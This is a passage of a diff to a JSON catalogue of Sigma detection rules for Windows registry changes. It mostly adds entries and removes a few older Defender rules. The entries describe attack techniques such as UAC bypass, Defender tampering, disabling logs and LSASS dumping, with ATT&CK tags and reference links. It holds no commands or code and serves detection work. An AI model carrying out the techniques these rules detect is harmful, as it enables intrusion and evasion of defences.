+ "uuid": "277dc340-0540-42e7-8efb-5ff460045e07",
+ "value": "Service Binary in Uncommon Folder"
+ },
+ {
+ "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_change_rdp_port.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.010"
+ ]
+ },
+ "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e",
+ "value": "Changing RDP Port to Non Standard Number"
+ },
+ {
+ "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry",
+ "meta": {
+ "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali",
+ "creation_date": "2022/08/01",
+ "falsepositive": [
+ "Administrator actions"
+ ],
+ "filename": "registry_set_windows_defender_tamper.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263",
+ "value": "Disable Windows Defender Functionalities Via Registry Keys"
+ },
+ {
+ "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/04/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_install_root_or_ca_certificat.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store" + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "meta": { + "author": "Omer Yampel, Christian Burkard", + "creation_date": "2017/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt" + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hhctrl_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + 
"https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx" + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_system_restore.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore" + }, + { + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "meta": { + "author": "Lednyov Alexey, oscd.community, Sreeman", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_telemetry_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Potential Registry Persistence Attempt Via Windows Telemetry" + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_outlook_c2_registry_key.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key" + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_logging_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled" + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable" + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disallowrun_execution.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": 
"275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_change_security_zones.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone" + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/05/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d",
+ "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download"
+ },
+ {
+ "description": "Detects UAC bypass method using Windows event viewer",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/03/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_uac_bypass_eventvwr.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
+ "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002",
+ "car.2019-04-001"
+ ]
+ },
+ "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6",
+ "value": "UAC Bypass via Event Viewer - Registry Set"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, 
frack113 (split)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8",
+ "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification" + }, + { + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "meta": { + "author": "D3F7A5105", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_evtx_file_key_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "value": "Potential EventLog File Location Tampering" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines"
+ ],
+ "filename": "registry_set_aedebug_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
+ "https://persistence-info.github.io/Data/aedebug.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "092af964-4233-4373-b4ba-d86ea2890288",
+ "value": "Add Debugger Entry To AeDebug For Persistence"
+ },
+ {
+ "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings",
 "meta": {
 "author": "Nasreddine Bencherchali",
 "creation_date": "2022/08/05",
 "falsepositive": [
 "Unlikely"
 ],
- "filename": "win_defender_exploit_guard_tamper.yml",
+ "filename": "registry_set_exploit_guard_susp_allowed_apps.yml",
 "level": "high",
- "logsource.category": "No established category",
+ "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886",
- "value": "Windows Defender Exploit Guard Tamper"
- },
- {
- "description": "Windows Defender logs when the history of detected infections is deleted. 
Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".",
- "meta": {
- "author": "Cian Heasley",
- "creation_date": "2020/08/13",
- "falsepositive": [
- "Deletion of Defender malware detections history for legitimate reasons"
- ],
- "filename": "win_defender_history_delete.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.001"
- ]
- },
- "uuid": "2afe6582-e149-11ea-87d0-0242ac130003",
- "value": "Windows Defender Malware Detection History Deletion"
- },
- {
- "description": "Detects blocking of process creations originating from PSExec and WMI commands",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2020/07/14",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_defender_psexec_wmi_asr.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands",
- "https://twitter.com/duff22b/status/1280166329660497920",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.lateral_movement",
- "attack.t1047",
- "attack.t1569.002"
- ]
- },
- "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003",
- "value": "PSExec and WMI Process Creations Block"
- },
- {
- "description": "Detects block of attempt to disable real time protection of Microsoft 
Defender by tamper protection",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/07/05",
- "falsepositive": [
- "Administrator actions"
- ],
- "filename": "win_defender_tamper_protection_trigger.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
+ "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml"
 ],
 "tags": [
 "attack.defense_evasion",
 "attack.t1562.001"
 ]
 },
- "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856",
- "value": "Microsoft Defender Tamper Protection Trigger"
+ "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0",
+ "value": "Suspicious Application Allowed Through Exploit Guard"
 },
 {
- "description": "Detects all actions taken by Windows Defender malware detection engines",
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
 "meta": {
- "author": "Ján Trenčanský",
- "creation_date": "2020/07/28",
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification" + }, + { + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "meta": { + "author": "@pbssubhash", + "creation_date": "2022/12/08", + "falsepositive": [ + "Legitimate application that needs to do a full dump of their process" + ], + "filename": "registry_set_lsass_usermode_dumping.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "value": "Lsass Full Dump Request Via DumpType Registry Settings" + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + 
"meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dhcp_calloutdll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation" + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_special_accounts.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key" + }, + { + "description": "Bypasses User Account Control using a fileless method", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "level": "high", + "logsource.category": "registry_set", + 
"logsource.product": "windows", + "refs": [ + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute" + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_as_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry" + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/09/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.sans.org/cyber-security-summit/archives", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ] + }, + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR Profiler Environment Variables" + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "filename": "registry_set_sophos_av_tamaper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys" + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/01", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "filename": "registry_set_susp_printer_driver.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer" + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_timeproviders_dllname.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ] + }, + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": 